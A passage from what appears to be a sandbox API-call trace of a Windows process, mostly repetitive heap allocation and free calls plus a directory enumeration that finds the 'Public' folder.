returned 1 [0056.099] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee50 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257390 [0056.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee50 | out: hHeap=0x660000) returned 1 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x498) returned 0x32947b0 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee50 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e590 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee78 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e798 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ea68 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e9f0 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e720 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e450 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e8d8 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5b8 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5e0 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e9a0 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ef90 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e748 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e9c8 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebd0 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x328b7e8 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x328b708 [0056.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x328b7b0 [0056.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ea40 | out: hHeap=0x660000) returned 1 [0056.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eea0 | out: hHeap=0x660000) returned 1 [0056.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eb08 | out: hHeap=0x660000) returned 1 [0056.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e478 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee28 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328d870 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eab8 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edd8 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ef68 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e6d0 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed10 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e4f0 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e6f8 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec70 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328efb8 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ea18 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e4c8 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e568 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e7c0 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ef18 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ecc0 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e860 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e630 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216830 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32997c0 | out: hHeap=0x660000) returned 1 [0056.101] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257668 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257390 | out: hHeap=0x660000) returned 1 [0056.101] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0056.101] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e2e8 [0056.102] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e658 | out: hHeap=0x660000) returned 1 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e888 | out: hHeap=0x660000) returned 1 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ece8 | out: hHeap=0x660000) returned 1 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e4a0 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eb30 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e6a8 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165a8 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0056.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.104] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.107] 